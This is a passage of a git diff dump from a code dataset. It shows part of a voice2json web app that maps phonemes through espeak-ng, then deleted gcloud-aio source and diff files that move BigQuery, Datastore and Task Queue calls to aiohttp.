) - - -# ----------------------------------------------------------------------------- - -espeak_words = {} -wav_cache = {} -espeak_cache_dir = tempfile.TemporaryDirectory() - -atexit.register(lambda: espeak_cache_dir.cleanup()) - - -@app.route("/phonemes", methods=["GET", "POST"]) -async def phonemes(): - phoneme_map_path = Path(pydash.get(profile, "text-to-speech.espeak.phoneme-map")) - phoneme_map = {} - - if request.method == "POST": - form = await request.form - for var_name, var_value in form.items(): - if var_name.startswith("espeak_"): - phoneme = var_name[7:] - phoneme_map[phoneme] = var_value.strip() - - with open(phoneme_map_path, "w") as phoneme_map_file: - for phoneme in sorted(phoneme_map): - print(phoneme, phoneme_map[phoneme], file=phoneme_map_file) - - await flash(f"Wrote {phoneme_map_path}", "success") - - # Clear phoneme cache - for key in list(wav_cache.keys()): - if key.startswith("phoneme_"): - wav_cache.pop(key, None) - else: - # Load map from dictionary phonemes to eSpeak phonemes - with open(phoneme_map_path, "r") as phoneme_map_file: - for line in phoneme_map_file: - line = line.strip() - if len(line) == 0 or line.startswith("#"): - continue - - dict_phoneme, espeak_phoneme = re.split("\s+", line, maxsplit=1) - phoneme_map[dict_phoneme] = espeak_phoneme - - # Load word examples for each phoneme - phoneme_examples_path = Path( - pydash.get(profile, "speech-to-text.phoneme-examples-file") - ) - voice = pydash.get(profile, "text-to-speech.espeak.voice", "") - phoneme_examples = {} - - with open(phoneme_examples_path, "r") as phoneme_examples_file: - for line in phoneme_examples_file: - line = line.strip() - if len(line) == 0 or line.startswith("#"): - continue - - phoneme, word, pronunciation = re.split(r"\s+", line, maxsplit=2) - espeak_phoneme_str = "".join(phoneme_map[p] for p in pronunciation.split()) - - word_cache_key = f"word_{word}" - phoneme_cache_key = ( - "phoneme_" - + phoneme - + "_" - + base64.b64encode(espeak_phoneme_str.encode()).decode() - ) - - if word_cache_key not in wav_cache: - # Speak whole word - wav_path = Path(espeak_cache_dir.name) / f"{word_cache_key}.wav" - espeak_cmd = ["espeak-ng", "--sep= ", "-s", "80", "-w", str(wav_path)] - if len(voice) > 0: - espeak_cmd.extend(["-v", str(voice)]) - - espeak_cmd.append(word) - logger.debug(espeak_cmd) - result = subprocess.check_output( - espeak_cmd, universal_newlines=True - ).strip() - - espeak_word_str = result.replace("'", "") - espeak_words[word] = espeak_word_str - wav_cache[word_cache_key] = wav_path - - if phoneme_cache_key not in wav_cache: - # Speak mapped phonemes - wav_path = Path(espeak_cache_dir.name) / f"{phoneme_cache_key}.wav" - espeak_cmd = ["espeak-ng", "-s", "80", "-w", str(wav_path)] - if len(voice) > 0: - espeak_cmd.extend(["-v", str(voice)]) - - espeak_cmd.append(f"[[{espeak_phoneme_str}]]") - logger.debug(espeak_cmd) - subprocess.check_call(espeak_cmd) - wav_cache[phoneme_cache_key] = wav_path - - actual_espeak = " ".join(phoneme_map[p] for p in pronunciation.split()) - phoneme_examples[phoneme] = { - "word": word, - "pronunciation": pronunciation, - "expected": espeak_words[word], - "actual": actual_espeak, - "phoneme_key": phoneme_cache_key, - } - - # logger.debug(phoneme_examples) - - return await render_template( - "phonemes.html", - sorted=sorted, - profile=profile, - pydash=pydash, - phoneme_examples=phoneme_examples, - phoneme_map=phoneme_map, - ) - - -@app.route("/pronounce/", methods=["GET"]) -async def pronounce(name): - wav_path = wav_cache[name] - return send_file(open(wav_path, "rb"), mimetype="audio/wav") - - -# ----------------------------------------------------------------------------- -# Static Routes -# ----------------------------------------------------------------------------- - - -@app.route("/css/", methods=["GET"]) -def css(filename): - return send_from_directory("css", filename) - - -@app.route("/js/", methods=["GET"]) -def js(filename): - return send_from_directory("js", filename) - - -@app.route("/img/", methods=["GET"]) -def img(filename): - return send_from_directory("img", filename) - - -@app.errorhandler(Exception) -def handle_error(err) -> Tuple[str, int]: - logger.exception(err) - return (str(err), 500) - - -# ----------------------------------------------------------------------------- -# Utility Methods -# ----------------------------------------------------------------------------- - - -def voice2json(*args, text=True, input=None, stderr=None): - """Calls voice2json with the given arguments and current profile.""" - global profile_path - command = ["voice2json"] - - if profile_path is not None: - # Add profile - command.extend(["--profile", str(profile_path)]) - - command.extend(list(args)) - logger.debug(command) - - if text: - # Text-based I/O - return io.StringIO( - subprocess.check_output( - command, universal_newlines=True, input=input, stderr=stderr - ) - ) - else: - # Binary I/O - return io.BytesIO(subprocess.check_output(command, input=input, stderr=stderr)) - - -async def do_retrain(): - """Re-trains voice2json profile and flashes warnings for unknown words.""" - # Re-train - start_time = time.time() - result = voice2json("train-profile", stderr=subprocess.STDOUT).read() - train_seconds = time.time() - start_time - await flash(f"Re-trained in {train_seconds:0.2f} second(s)", "success") - - logger.debug(result) - - warn_lines = None - for line in result.splitlines(): - line = line.strip() - if line.startswith("-") or line.startswith("."): - continue - - if "unknown" in line: - warn_lines = [] - line = line + ":" - - if warn_lines is not None: - warn_lines.append(line) - - if warn_lines is not None: - await flash("\n".join(warn_lines), "warning") - - -# ----------------------------------------------------------------------------- - -if __name__ == "__main__": - parser = argparse.ArgumentParser() - parser.add_argument("--debug", action="store_true", help="Enable DEBUG mode") - parser.add_argument( - "--port", type=int, default=5000, help="Web server port (default: 5000)" - ) - parser.add_argument( - "--host", default="127.0.0.1", help="Web server host (default: 127.0.0.1)" - ) - parser.add_argument("--profile", help="Path to voice2json profile") - args = parser.parse_args() - - if args.debug: - logging.basicConfig(level=logging.DEBUG) - - logger.debug(args) - - if args.profile is not None: - profile_path = Path(args.profile) - - # Get profile as JSON from voice2json - profile = json.load(voice2json("print-profile")) - - # Start web server - app.run(port=args.port, host=args.host, debug=args.debug) diff --git a/v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.diff b/v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.diff deleted file mode 100644 index 5e4dc0a..0000000 --- a/v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.diff +++ /dev/null @@ -1,83 +0,0 @@ -diff --git a/bigquery/gcloud/aio/bigquery/bigquery.py b/bigquery/gcloud/aio/bigquery/bigquery.py - index 5b7b4fdb41813c83e0e0a2dbcbeb1f73c8fbbde0..45d94ddaf969648d5479ff480a92b16d537716f9 100644 - --- a/bigquery/gcloud/aio/bigquery/bigquery.py - +++ b/bigquery/gcloud/aio/bigquery/bigquery.py -@@ -2,8 +2,8 @@ import functools - import logging - import uuid - -+import aiohttp - from gcloud.aio.auth import Token --from gcloud.aio.core.http import post - try: - import ujson as json - except ModuleNotFoundError: -@@ -71,46 +71,37 @@ class Table(object): - - async def insert(self, rows, skip_invalid=False, ignore_unknown=True, - session=None): -- - session = session or self.session - -- body = make_insert_body( -- rows, -- skip_invalid=skip_invalid, -- ignore_unknown=ignore_unknown -- ) -- -- headers = await self.headers() -- -- url = '{}/{}'.format( -- API_ROOT, -- INSERT_TEMPLATE.format( -- proj=self.project, -- dataset=self.dataset_name, -- table=self.table_name -- ) -- ) -- -+ url = '{}/{}'.format(API_ROOT, INSERT_TEMPLATE.format( -+ proj=self.project, dataset=self.dataset_name, -+ table=self.table_name)) - log.info('Inserting %d rows to %s', len(rows), url) - -- status, content = await post( -- url, -- payload=body, -- headers=headers -- ) -+ body = make_insert_body(rows, skip_invalid=skip_invalid, -+ ignore_unknown=ignore_unknown) -+ payload = json.dumps(body).encode('utf-8') -+ -+ headers = await self.headers() -+ headers.update({ -+ 'Content-Length': str(len(payload)), -+ 'Content-Type': 'application/json' -+ }) - -- success = 299 >= status >= 200 and 'insertErrors' not in content -+ async with aiohttp.ClientSession() as s: -+ response = await s.post(url, data=payload, headers=headers, -+ params=None, timeout=60) -+ content = await response.json() - -- if success: -- return success -+ if 299 >= response.status >= 200 and 'insertErrors' not in content: -+ return True - -- log.debug('response code: %d', status) -+ log.debug('response code: %d', response.status) - log.debug('url: %s', url) -- log.debug('body:\n%s\n', body) -+ log.debug('body:\n%s\n', payload) - -- raise Exception('Could not insert: {}'.format(json.dumps( -- content, sort_keys=True -- ))) -+ raise Exception('Could not insert: {}'.format( -+ json.dumps(content, sort_keys=True))) - - - async def stream_insert(table, rows): diff --git a/v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.source.py b/v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.source.py deleted file mode 100644 index c623df9..0000000 --- a/v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.source.py +++ /dev/null @@ -1,135 +0,0 @@ -import functools -import logging -import uuid - -from gcloud.aio.auth import Token -from gcloud.aio.core.http import post -try: - import ujson as json -except ModuleNotFoundError: - import json - - -API_ROOT = 'https://www.googleapis.com/bigquery/v2' -INSERT_TEMPLATE = 'projects/{proj}/datasets/{dataset}/tables/{table}/insertAll' -SCOPES = [ - 'https://www.googleapis.com/auth/bigquery.insertdata' -] - -log = logging.getLogger(__name__) - - -def make_insert_body(rows, skip_invalid=False, ignore_unknown=True): - - return { - 'kind': 'bigquery#tableDataInsertAllRequest', - 'skipInvalidRows': skip_invalid, - 'ignoreUnknownValues': ignore_unknown, - 'rows': rows - } - - -def new_insert_id(): - - return uuid.uuid4().hex - - -def make_rows(rows): - - bq_rows = [{ - 'insertId': new_insert_id(), - 'json': row - } for row in rows] - - return bq_rows - - -class Table(object): - - def __init__(self, project, service_file, dataset_name, table_name, - session=None, token=None): - # pylint: disable=too-many-arguments - - self.project = project - self.table_name = table_name - self.dataset_name = dataset_name - self.session = session - self.token = token or Token( - project, - service_file, - session=session, - scopes=SCOPES - ) - - async def headers(self): - - token = await self.token.get() - - return { - 'Authorization': 'Bearer {}'.format(token) - } - - async def insert(self, rows, skip_invalid=False, ignore_unknown=True, - session=None): - - session = session or self.session - - body = make_insert_body( - rows, - skip_invalid=skip_invalid, - ignore_unknown=ignore_unknown - ) - - headers = await self.headers() - - url = '{}/{}'.format( - API_ROOT, - INSERT_TEMPLATE.format( - proj=self.project, - dataset=self.dataset_name, - table=self.table_name - ) - ) - - log.info('Inserting %d rows to %s', len(rows), url) - - status, content = await post( - url, - payload=body, - headers=headers - ) - - success = 299 >= status >= 200 and 'insertErrors' not in content - - if success: - return success - - log.debug('response code: %d', status) - log.debug('url: %s', url) - log.debug('body:\n%s\n', body) - - raise Exception('Could not insert: {}'.format(json.dumps( - content, sort_keys=True - ))) - - -async def stream_insert(table, rows): - - insert_rows = make_rows(rows) - result = await table.insert(insert_rows) - - return result - - -def make_stream_insert(project, service_file, dataset_name, table_name, - session=None): - - table = Table( - project, - service_file, - dataset_name, - table_name, - session=session - ) - - return functools.partial(stream_insert, table) diff --git a/v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.target.py b/v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.target.py deleted file mode 100644 index 34e5a77..0000000 --- a/v1/data/codefile/talkiq@gcloud-aio__45d94dd__bigquery$gcloud$aio$bigquery$bigquery.py.target.py +++ /dev/null @@ -1,126 +0,0 @@ -import functools -import logging -import uuid - -import aiohttp -from gcloud.aio.auth import Token -try: - import ujson as json -except ModuleNotFoundError: - import json - - -API_ROOT = 'https://www.googleapis.com/bigquery/v2' -INSERT_TEMPLATE = 'projects/{proj}/datasets/{dataset}/tables/{table}/insertAll' -SCOPES = [ - 'https://www.googleapis.com/auth/bigquery.insertdata' -] - -log = logging.getLogger(__name__) - - -def make_insert_body(rows, skip_invalid=False, ignore_unknown=True): - - return { - 'kind': 'bigquery#tableDataInsertAllRequest', - 'skipInvalidRows': skip_invalid, - 'ignoreUnknownValues': ignore_unknown, - 'rows': rows - } - - -def new_insert_id(): - - return uuid.uuid4().hex - - -def make_rows(rows): - - bq_rows = [{ - 'insertId': new_insert_id(), - 'json': row - } for row in rows] - - return bq_rows - - -class Table(object): - - def __init__(self, project, service_file, dataset_name, table_name, - session=None, token=None): - # pylint: disable=too-many-arguments - - self.project = project - self.table_name = table_name - self.dataset_name = dataset_name - self.session = session - self.token = token or Token( - project, - service_file, - session=session, - scopes=SCOPES - ) - - async def headers(self): - - token = await self.token.get() - - return { - 'Authorization': 'Bearer {}'.format(token) - } - - async def insert(self, rows, skip_invalid=False, ignore_unknown=True, - session=None): - session = session or self.session - - url = '{}/{}'.format(API_ROOT, INSERT_TEMPLATE.format( - proj=self.project, dataset=self.dataset_name, - table=self.table_name)) - log.info('Inserting %d rows to %s', len(rows), url) - - body = make_insert_body(rows, skip_invalid=skip_invalid, - ignore_unknown=ignore_unknown) - payload = json.dumps(body).encode('utf-8') - - headers = await self.headers() - headers.update({ - 'Content-Length': str(len(payload)), - 'Content-Type': 'application/json' - }) - - async with aiohttp.ClientSession() as s: - response = await s.post(url, data=payload, headers=headers, - params=None, timeout=60) - content = await response.json() - - if 299 >= response.status >= 200 and 'insertErrors' not in content: - return True - - log.debug('response code: %d', response.status) - log.debug('url: %s', url) - log.debug('body:\n%s\n', payload) - - raise Exception('Could not insert: {}'.format( - json.dumps(content, sort_keys=True))) - - -async def stream_insert(table, rows): - - insert_rows = make_rows(rows) - result = await table.insert(insert_rows) - - return result - - -def make_stream_insert(project, service_file, dataset_name, table_name, - session=None): - - table = Table( - project, - service_file, - dataset_name, - table_name, - session=session - ) - - return functools.partial(stream_insert, table) diff --git a/v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.diff b/v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.diff deleted file mode 100644 index 5243fbc..0000000 --- a/v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.diff +++ /dev/null @@ -1,83 +0,0 @@ -diff --git a/datastore/gcloud/aio/datastore/datastore.py b/datastore/gcloud/aio/datastore/datastore.py - index a0dec8f2fbd615b39c7ba56ac2861262f4e38c6e..963f34706918757ab7d3cbad70c363b9a48b9d40 100644 - --- a/datastore/gcloud/aio/datastore/datastore.py - +++ b/datastore/gcloud/aio/datastore/datastore.py -@@ -1,11 +1,15 @@ - import datetime - import logging - -+import aiohttp - from gcloud.aio.auth import Token --from gcloud.aio.core.http import post - from gcloud.aio.datastore.constants import Mode - from gcloud.aio.datastore.constants import Operation - from gcloud.aio.datastore.constants import TypeName -+try: -+ import ujson as json -+except ModuleNotFoundError: -+ import json - - - API_ROOT = 'https://datastore.googleapis.com/v1/projects' -@@ -115,20 +119,23 @@ class Datastore(object): - async def transact(self): - url = '{}/{}:beginTransaction'.format(API_ROOT, self.project) - headers = await self.headers() -- body = {} -+ headers.update({ -+ 'Content-Length': '0', -+ 'Content-Type': 'application/json' -+ }) - -- status, content = await post(url, payload={}, headers=headers) -+ async with aiohttp.ClientSession() as s: -+ response = await s.post(url, data={}, headers=headers, params=None, -+ timeout=60) -+ content = await response.json() - - # TODO: make this raise_for_status-able. -- success = 299 >= status >= 200 -- -- if success: -+ if 299 >= response.status >= 200: - transaction = content['transaction'] - return transaction - -- log.debug('response code: %d', status) -+ log.debug('response code: %d', response.status) - log.debug('url: %s', url) -- log.debug('body:\n%s\n', body) - - raise Exception('Could not transact: {}'.format(content)) - -@@ -136,18 +143,24 @@ class Datastore(object): - url = '{}/{}:commit'.format(API_ROOT, self.project) - - body = make_commit_body(transaction, mode, mutations) -+ payload = json.dumps(body).encode('utf-8') - - headers = await self.headers() -+ headers.update({ -+ 'Content-Length': str(len(payload)), -+ 'Content-Type': 'application/json' -+ }) - -- status, content = await post(url, payload=body, headers=headers) -+ async with aiohttp.ClientSession() as s: -+ response = await s.post(url, data=payload, headers=headers, -+ params=None, timeout=60) -+ content = await response.json() - - # TODO: make this raise_for_status-able. -- success = 299 >= status >= 200 and 'insertErrors' not in content -- -- if success: -- return success -+ if 299 >= response.status >= 200 and 'insertErrors' not in content: -+ return True - -- raise Exception('{}: {} > {}'.format(status, url, content)) -+ raise Exception('{}: {} > {}'.format(response.status, url, content)) - - # TODO: look into deletion payload format - diff --git a/v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.source.py b/v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.source.py deleted file mode 100644 index 0a193c3..0000000 --- a/v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.source.py +++ /dev/null @@ -1,176 +0,0 @@ -import datetime -import logging - -from gcloud.aio.auth import Token -from gcloud.aio.core.http import post -from gcloud.aio.datastore.constants import Mode -from gcloud.aio.datastore.constants import Operation -from gcloud.aio.datastore.constants import TypeName - - -API_ROOT = 'https://datastore.googleapis.com/v1/projects' -SCOPES = [ - 'https://www.googleapis.com/auth/datastore', - 'https://www.googleapis.com/auth/cloud-platform', -] - -log = logging.getLogger(__name__) - - -def infer_type(value): - # TODO: support more than just scalars - type_name = { - bytes: TypeName.BLOB, - datetime.datetime: TypeName.TIMESTAMP, - float: TypeName.DOUBLE, - int: TypeName.INTEGER, - str: TypeName.STRING, - type(False): TypeName.BOOLEAN, - type(None): TypeName.NULL, - }.get(type(value)) - - if not type_name: - raise Exception('Type {} not supported for DS insert. :('.format( - type(value) - )) - - return type_name - - -def format_timestamp(dt): - # RFC3339 UTC "Zulu" format, accurate to nanoseconds - return dt.strftime('%Y-%m-%dT%H:%S:%M.%f000Z') - - -def format_value(type_name, value): - formatted_value = { - TypeName.TIMESTAMP: format_timestamp, - }.get(type_name, lambda v: v)(value) - - return formatted_value - - -def make_commit_body(transaction, mode=Mode.TRANSACTIONAL, mutations=None): - if not mutations: - raise Exception('At least one mutation record is required.') - - return { - 'mode': mode.value, - 'mutations': mutations, - 'transaction': transaction, - } - - -def make_mutation_record(operation, kind, name, properties, project): - props = make_properties(properties) - - mutation = { - operation.value: { - 'key': { - 'partitionId': { - 'projectId': project, - 'namespaceId': '', - }, - 'path': [ - { - 'kind': kind, - 'name': name, - }, - ], - }, - 'properties': props, - } - } - - return mutation - - -def make_properties(properties): - return {k: make_value(v) for k, v in properties.items()} - - -def make_value(value): - type_name = infer_type(value) - - return { - 'excludeFromIndexes': False, - type_name.value: format_value(type_name, value), - } - - -class Datastore(object): - def __init__(self, project, service_file, session=None, token=None): - self.project = project - self.session = session - self.token = token or Token(project, service_file, session=session, - scopes=SCOPES) - - async def headers(self): - token = await self.token.get() - - return { - 'Authorization': 'Bearer {}'.format(token), - } - - async def transact(self): - url = '{}/{}:beginTransaction'.format(API_ROOT, self.project) - headers = await self.headers() - body = {} - - status, content = await post(url, payload={}, headers=headers) - - # TODO: make this raise_for_status-able. - success = 299 >= status >= 200 - - if success: - transaction = content['transaction'] - return transaction - - log.debug('response code: %d', status) - log.debug('url: %s', url) - log.debug('body:\n%s\n', body) - - raise Exception('Could not transact: {}'.format(content)) - - async def commit(self, transaction, mutations, mode=Mode.TRANSACTIONAL): - url = '{}/{}:commit'.format(API_ROOT, self.project) - - body = make_commit_body(transaction, mode, mutations) - - headers = await self.headers() - - status, content = await post(url, payload=body, headers=headers) - - # TODO: make this raise_for_status-able. - success = 299 >= status >= 200 and 'insertErrors' not in content - - if success: - return success - - raise Exception('{}: {} > {}'.format(status, url, content)) - - # TODO: look into deletion payload format - - async def insert(self, kind, name, properties, session=None): - return await self.operate(Operation.INSERT, kind, name, properties, - session=session) - - async def update(self, kind, name, properties, session=None): - return await self.operate(Operation.UPDATE, kind, name, properties, - session=session) - - async def upsert(self, kind, name, properties, session=None): - return await self.operate(Operation.UPSERT, kind, name, properties, - session=session) - - async def operate(self, operation, kind, name, properties, session=None): - # pylint: disable=too-many-arguments - # TODO: tune pylint argument limits - transaction = await self.transact() - - session = session or self.session - - mutation = make_mutation_record(operation, kind, name, properties, - self.project) - - return await self.commit(transaction, mutations=[mutation]) diff --git a/v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.target.py b/v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.target.py deleted file mode 100644 index daf5e50..0000000 --- a/v1/data/codefile/talkiq@gcloud-aio__963f347__datastore$gcloud$aio$datastore$datastore.py.target.py +++ /dev/null @@ -1,189 +0,0 @@ -import datetime -import logging - -import aiohttp -from gcloud.aio.auth import Token -from gcloud.aio.datastore.constants import Mode -from gcloud.aio.datastore.constants import Operation -from gcloud.aio.datastore.constants import TypeName -try: - import ujson as json -except ModuleNotFoundError: - import json - - -API_ROOT = 'https://datastore.googleapis.com/v1/projects' -SCOPES = [ - 'https://www.googleapis.com/auth/datastore', - 'https://www.googleapis.com/auth/cloud-platform', -] - -log = logging.getLogger(__name__) - - -def infer_type(value): - # TODO: support more than just scalars - type_name = { - bytes: TypeName.BLOB, - datetime.datetime: TypeName.TIMESTAMP, - float: TypeName.DOUBLE, - int: TypeName.INTEGER, - str: TypeName.STRING, - type(False): TypeName.BOOLEAN, - type(None): TypeName.NULL, - }.get(type(value)) - - if not type_name: - raise Exception('Type {} not supported for DS insert. :('.format( - type(value) - )) - - return type_name - - -def format_timestamp(dt): - # RFC3339 UTC "Zulu" format, accurate to nanoseconds - return dt.strftime('%Y-%m-%dT%H:%S:%M.%f000Z') - - -def format_value(type_name, value): - formatted_value = { - TypeName.TIMESTAMP: format_timestamp, - }.get(type_name, lambda v: v)(value) - - return formatted_value - - -def make_commit_body(transaction, mode=Mode.TRANSACTIONAL, mutations=None): - if not mutations: - raise Exception('At least one mutation record is required.') - - return { - 'mode': mode.value, - 'mutations': mutations, - 'transaction': transaction, - } - - -def make_mutation_record(operation, kind, name, properties, project): - props = make_properties(properties) - - mutation = { - operation.value: { - 'key': { - 'partitionId': { - 'projectId': project, - 'namespaceId': '', - }, - 'path': [ - { - 'kind': kind, - 'name': name, - }, - ], - }, - 'properties': props, - } - } - - return mutation - - -def make_properties(properties): - return {k: make_value(v) for k, v in properties.items()} - - -def make_value(value): - type_name = infer_type(value) - - return { - 'excludeFromIndexes': False, - type_name.value: format_value(type_name, value), - } - - -class Datastore(object): - def __init__(self, project, service_file, session=None, token=None): - self.project = project - self.session = session - self.token = token or Token(project, service_file, session=session, - scopes=SCOPES) - - async def headers(self): - token = await self.token.get() - - return { - 'Authorization': 'Bearer {}'.format(token), - } - - async def transact(self): - url = '{}/{}:beginTransaction'.format(API_ROOT, self.project) - headers = await self.headers() - headers.update({ - 'Content-Length': '0', - 'Content-Type': 'application/json' - }) - - async with aiohttp.ClientSession() as s: - response = await s.post(url, data={}, headers=headers, params=None, - timeout=60) - content = await response.json() - - # TODO: make this raise_for_status-able. - if 299 >= response.status >= 200: - transaction = content['transaction'] - return transaction - - log.debug('response code: %d', response.status) - log.debug('url: %s', url) - - raise Exception('Could not transact: {}'.format(content)) - - async def commit(self, transaction, mutations, mode=Mode.TRANSACTIONAL): - url = '{}/{}:commit'.format(API_ROOT, self.project) - - body = make_commit_body(transaction, mode, mutations) - payload = json.dumps(body).encode('utf-8') - - headers = await self.headers() - headers.update({ - 'Content-Length': str(len(payload)), - 'Content-Type': 'application/json' - }) - - async with aiohttp.ClientSession() as s: - response = await s.post(url, data=payload, headers=headers, - params=None, timeout=60) - content = await response.json() - - # TODO: make this raise_for_status-able. - if 299 >= response.status >= 200 and 'insertErrors' not in content: - return True - - raise Exception('{}: {} > {}'.format(response.status, url, content)) - - # TODO: look into deletion payload format - - async def insert(self, kind, name, properties, session=None): - return await self.operate(Operation.INSERT, kind, name, properties, - session=session) - - async def update(self, kind, name, properties, session=None): - return await self.operate(Operation.UPDATE, kind, name, properties, - session=session) - - async def upsert(self, kind, name, properties, session=None): - return await self.operate(Operation.UPSERT, kind, name, properties, - session=session) - - async def operate(self, operation, kind, name, properties, session=None): - # pylint: disable=too-many-arguments - # TODO: tune pylint argument limits - transaction = await self.transact() - - session = session or self.session - - mutation = make_mutation_record(operation, kind, name, properties, - self.project) - - return await self.commit(transaction, mutations=[mutation]) diff --git a/v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.diff b/v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.diff deleted file mode 100644 index 4d7e51a..0000000 --- a/v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.diff +++ /dev/null @@ -1,502 +0,0 @@ -diff --git a/taskqueue/gcloud/aio/taskqueue/taskqueue.py b/taskqueue/gcloud/aio/taskqueue/taskqueue.py - index 811303e7ec900b3f4c50664f43f0f0cde8b5c06d..d15540f94ecdf468b1baf7fd9c025e4f862b3b69 100644 - --- a/taskqueue/gcloud/aio/taskqueue/taskqueue.py - +++ b/taskqueue/gcloud/aio/taskqueue/taskqueue.py -@@ -2,375 +2,148 @@ - An asynchronous queue for Google Appengine Task Queues - """ - import asyncio --import datetime --import json --import logging --import time - --import ujson -+import aiohttp - from gcloud.aio.auth import Token --from gcloud.aio.core.aio import call_later --from gcloud.aio.core.http import delete --from gcloud.aio.core.http import get --from gcloud.aio.core.http import HttpError --from gcloud.aio.core.http import patch --from gcloud.aio.core.http import post --from gcloud.aio.taskqueue.utils import encode - - --API_ROOT = 'https://www.googleapis.com/taskqueue/v1beta2/projects' -+API_ROOT = 'https://cloudtasks.googleapis.com/v2beta2' -+LOCATION = 'us-central1' - SCOPES = [ -- 'https://www.googleapis.com/auth/taskqueue', -- 'https://www.googleapis.com/auth/taskqueue.consumer', -- 'https://www.googleapis.com/auth/cloud-taskqueue', -- 'https://www.googleapis.com/auth/cloud-taskqueue.consumer', -+ 'https://www.googleapis.com/auth/cloud-tasks', - ] --TASK_QUEUE_URL = '{api_root}/s~{project_name}/taskqueues/{queue_name}/tasks' - --log = logging.getLogger(__name__) - -- --def make_insert_body(queue_name: str, payload: dict): -- -- delta = datetime.datetime.now() - datetime.datetime(1970, 1, 1) -- micro_sec_since_epock = int(delta.total_seconds() * 1000000) -- encoded_payload = encode(ujson.dumps(payload)) -- -- return { -- 'kind': 'taskqueues#task', -- 'queueName': queue_name, -- 'payloadBase64': encoded_payload, -- 'enqueueTimestamp': micro_sec_since_epock, -- 'leaseTimestamp': 0, -- 'retry_count': 0 -- } -- -- --def make_renew_body(queue_name: str, id_: str): -- -- return { -- 'kind': 'taskqueues#task', -- 'id': id_, -- 'queueName': queue_name -- } -- -- --class TaskQueue(object): -- -- """ -- An asynchronous Google Task Queue -- """ -- -- def __init__(self, project, service_file, task_queue, session=None, -- token=None): -+class TaskQueue: -+ def __init__(self, project, service_file, taskqueue, location=LOCATION, -+ session=None, token=None): - # pylint: disable=too-many-arguments -+ self.session = session or aiohttp.ClientSession() - -- self.task_queue = task_queue -- self.service_file = service_file -- self.session = session -- self.token = token or Token( -- project, -- self.service_file, -- session=self.session, -- scopes=SCOPES -- ) -- self.url = TASK_QUEUE_URL.format( -- api_root=API_ROOT, -- project_name=project, -- queue_name=task_queue -- ) -- -- async def insert_task(self, payload, tag='', session=None): -- -- session = session or self.session -- -- if tag: -- payload['tag'] = tag -- -- body = make_insert_body(self.task_queue, payload) -- -- token = await self.token.get() -- -- status, content = await post( -- self.url, -- payload=body, -- session=session, -- headers={ -- 'Authorization': 'Bearer {}'.format(token) -- } -- ) -- -- success = status >= 200 and status < 300 -- -- if not success: -- log.error('Could not insert task into %s: %s', self.task_queue, -- content) -- -- return success -- -- async def get_stats(self, session=None): -- -- """ -- get the task queue statistics -- """ -- -- session = session or self.session -- -- token = await self.token.get() -- -- status, content = await get( -- '/'.join(self.url.split('/')[:-1]), -- params={'getStats': 'true'}, -- headers={'Authorization': 'Bearer {}'.format(token)}, -- session=session -- ) -- -- if 200 <= status < 300: -- return content -+ self.api_root = '{}/projects/{}/locations/{}/queues/{}'.format( -+ API_ROOT, project, location, taskqueue) - -- raise HttpError('Could not get stats for {} -> {}: {}'.format( -- self.task_queue, -- status, -- content -- )) -+ self.token = token or Token(project, service_file, scopes=SCOPES, -+ session=self.session) - -- async def delete_task(self, id_, session=None): -- -- session = session or self.session -- -- token = await self.token.get() -- -- url = '{}/{}'.format(self.url, id_) -- -- status, phrase = await delete( -- url, -- headers={'Authorization': 'Bearer {}'.format(token)}, -- session=session -- ) -- -- if 200 <= status < 300: -- return True -- -- log.error('Error deleting task %s -> %s: %s', id_, status, phrase) -- -- async def lease_task(self, lease_seconds=60, num_tasks=1, tag=None, -- session=None): -- -- """ -- lease a task or tasks from the task queue -- """ -- -- session = session or self.session -+ async def headers(self): -+ return { -+ 'Authorization': 'Bearer {}'.format(await self.token.get()), -+ 'Content-Type': 'application/json', -+ } - -- token = await self.token.get() -+ # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/acknowledge -+ async def ack(self, task, session=None): -+ url = '{}/{}:acknowledge'.format(API_ROOT, task['name']) -+ body = { -+ 'scheduleTime': task['scheduleTime'], -+ } - -- url = '{}/{}'.format(self.url, 'lease') -+ s = session or self.session -+ resp = await s.post(url, json=body, headers=await self.headers()) -+ resp.raise_for_status() -+ return await resp.json() -+ -+ # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/cancelLease -+ async def cancel(self, task, session=None): -+ url = '{}/{}:cancelLease'.format(API_ROOT, task['name']) -+ body = { -+ 'scheduleTime': task['scheduleTime'], -+ 'responseView': 'BASIC', -+ } - -+ s = session or self.session -+ resp = await s.post(url, json=body, headers=await self.headers()) -+ resp.raise_for_status() -+ return await resp.json() -+ -+ # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/delete -+ async def delete(self, tname, session=None): -+ url = '{}/{}'.format(API_ROOT, tname) 